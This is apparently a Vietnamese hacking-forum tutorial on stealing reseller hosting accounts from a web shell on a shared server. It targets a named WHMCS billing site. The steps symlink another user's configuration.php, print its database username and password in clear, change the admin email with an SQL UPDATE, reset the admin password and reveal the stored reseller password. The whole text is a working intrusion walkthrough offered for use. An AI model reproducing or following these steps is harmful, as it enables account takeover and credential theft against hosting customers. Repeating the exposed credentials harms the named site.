[TUT] - Chôm Reseller Hosting bằng local attack

Thấy mọi người coi thường shell server nước ngoài quá nên hum nay rảnh + đang sướng vì đục đc 7 con reseller nên làm cái tut này cho mọi người . Phương pháp : Đục tường thần chưởng ( a.k.a local attack ) code WHMCS Nguyện liệu : - 1 con shell ( tất nhiên , ko thì local = cái niềm thương yêu à ) - reverse tool : tui dung code X share , http://b3pro.us/reverse Bắt đầu vào công việc : Bước 1 : Đầu tiên ta reverse link shell để coi sv đấy có site bán host nào ko :”> Con shell của tui là : http://96.30.11.108/~se0418b/egy.php Reverse ta đc 1 đống , ta dung công cụ find của FF , find với từ khóa : host Đây rồi , nhai em này nhá _http://www.posiblehost.com Để xem em này dung code gì nào Hô hô , WHMCS , ngon rồi :”> Bước 2 : Local thôi chứ còn gì nữa , file chưa info data của code WHMCS này là configuration.php Tiến hành symlink thôi , dễ ko hà Find user nè : Dùng lệnh : ln -s /home/posible/public_html/clientes/configuration.php a.txt Xong roày , thử view file vừa symlink nào Hê hê , đây roày Bước 3 : Connect database , điền info lúc nãy lấy đc vào con shell :”> Ta có : $db_username = “posible_posible”; $db_password = “cdann123″; $db_name = “posible_clientes” Table chúng ta cần chú ý đến là : tbladmins <~ vâng , chính hắn Đây là info user admin , cách quen thuộc , update pass admin Câu lệnh : update tbladmins set email=”mail@anhlt.net” where id=”1″ Bụp chíu , xong roài , h vào admin panel của nó forgot pass Link admin panel nè : http://www.posiblehost.com/clientes/admin/login.php Forgot pass bằng cách nhấn vào dòng : “Forgotten your password? Click Here” ở dưới Gửi về mail rồi nè Login thôi chứ nhỉ À khoan , các bạn chuyển qua IE nhá , vì sao à , ko thích nói có đc ko , bình tĩnh xem tiếp đi Bước 4 : Vào đc admincp của nó rồi nè Các bạn làm theo ảnh ở dưới Thấy gì hem Đến lúc IE phát huy tác dụng roày Ta dùng tool soi pass dưới dạng sao để soi pass của reseller ( FF dùng mấy cái này hem có tác dụng ) Xong roày Có cái reseller chơi ngon ơ – End tut – Tut By LTA – Xgroupvn.org – Với sự xúi dục của X-Ecpanel P/S : hàng hack hem dùng bền lâu đc nên chỉ dùng vào những việc ngắn hạn thôi nhá